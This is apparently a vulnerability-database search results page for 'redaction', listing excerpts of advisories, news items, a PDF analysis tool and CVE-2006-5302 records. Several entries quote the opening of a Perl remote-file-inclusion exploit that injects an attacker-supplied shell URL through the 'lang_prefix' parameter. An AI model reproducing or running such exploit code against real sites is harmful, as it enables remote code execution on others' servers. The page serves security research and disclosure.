Lucene search
K

1272 matches found

Hacker One
Hacker One
added 2017/07/10 6:40 a.m.44 views

HackerOne: Reading redacted data via hackbot's answers

Summary: Hello, I have found a way to use hackbot's automated duplication answers to reveal redacted data via brute force. This is restricted by the length of the report and number of radacted items. For short report with little content and just 1-2 redacted texts this is rather easy to accomplis...

6.9AI score
Exploits0
Kitploit
Kitploit
added 2014/08/14 12:47 a.m.26 views

ParanoiDF - PDF Analysis Suite: Password cracking, redaction recovery, DRM removal, malicious JavaScript extraction, and more

The swiss army knife of PDF Analysis Tools. Based on peepdf - http://peepdf.eternal-todo.com. Features Interactive Console: Type "help" to get a list of commands. Type "help command" to get a description/usage on specific command. crackpw This executes Nacho Barrientos Arias's PDFCrack tool by...

7.3AI score
Exploits0References1
The Hacker News
The Hacker News
added 2014/08/09 12:16 a.m.12 views

Researcher Uncovers Vulnerability Oracle Data Redaction Security Feature

Oracle’s newly launched Data Redaction security feature in Oracle Database 12c can be easily disrupted by an attacker without any need to use exploit code, a security researcher long known as a thorn in Oracle's side said at Defcon. Data Redaction is one of the new Advanced Security features...

8.1AI score
Exploits0
ThreatPost
ThreatPost
added 2014/08/06 7:9 p.m.13 views

Oracle Database Redaction 'Trivial to Bypass'

LAS VEGAS–David Litchfield for many years was one of the top bug hunters in the game and specialized in causing large-scale headaches for Oracle. When he decided to retire and go scuba diving, there likely were few tears shed in Redwood City. Litchfield recently decided to resurface, which is goo...

0.5AI score
Exploits0References2
Kaspersky
Kaspersky
added 2010/02/02 12:0 a.m.18 views

KLA10315 Multiple vulnerabilities in SUPERAntiSpyware

Multiple serious vulnerabilities have been found in SUPERAntiSpyware. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code and gain privileges. Below is a complete list of vulnerabilities 1. Unsafe buffers, function parameter handling, unsafe pointe...

8.8AI score
Exploits0References3
NVD
NVD
added 2006/10/17 3:7 p.m.9 views

CVE-2006-5302

Multiple PHP remote file inclusion vulnerabilities in Redaction System 1.0000 allow remote attackers to execute arbitrary PHP code via a URL in the 1 langprefix parameter to a conn.php, b sesscheck.php, c wap/conn.php, or d wap/sesscheck.php, or the 2 lang parameter to e index.php...

7.5CVSS7.6AI score0.09403EPSS
Exploits0References12
Cvelist
Cvelist
added 2006/10/17 3:0 p.m.16 views

CVE-2006-5302

Multiple PHP remote file inclusion vulnerabilities in Redaction System 1.0000 allow remote attackers to execute arbitrary PHP code via a URL in the 1 langprefix parameter to a conn.php, b sesscheck.php, c wap/conn.php, or d wap/sesscheck.php, or the 2 lang parameter to e index.php...

7.6AI score0.09403EPSS
Exploits0References12
CVE
CVE
added 2006/10/17 3:0 p.m.40 views

CVE-2006-5302

CVE-2006-5302 involves multiple PHP remote file inclusion vulnerabilities in Redaction System 1.0000. The issue allows remote attackers to execute arbitrary PHP code by supplying a URL in the (1) lang_prefix parameter to conn.php, sesscheck.php, wap/conn.php, or wap/sesscheck.php, or the (2) lang...

7.5CVSS8AI score0.09403EPSS
Exploits0References12Affected Software1
seebug.org
seebug.org
added 2006/10/12 12:0 a.m.12 views

Redaction System 1.0 (lang_prefix) Remote File Include Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file = "index.php?lang="; elsif $fileno ...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/10/12 12:0 a.m.37 views

Redaction System 1.0 (lang_prefix) Remote File Include Exploit

Exploit for unknown platform in category web applications ============================================================== Redaction System 1.0 langprefix Remote File Include Exploit ============================================================== !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0;...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2006/10/12 12:0 a.m.14 views

Redaction System 1.0 - lang_prefix Remote File Inclusion

Redaction System 1.0 - langprefix Remote File Inclusion !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file =...

0.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/10/12 12:0 a.m.38 views

Redaction System 1.0 - 'lang_prefix' Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file = "index.php?lang="; elsif $fileno eq 3 $file =...

7.4AI score
Exploits0
Rows per page
Query Builder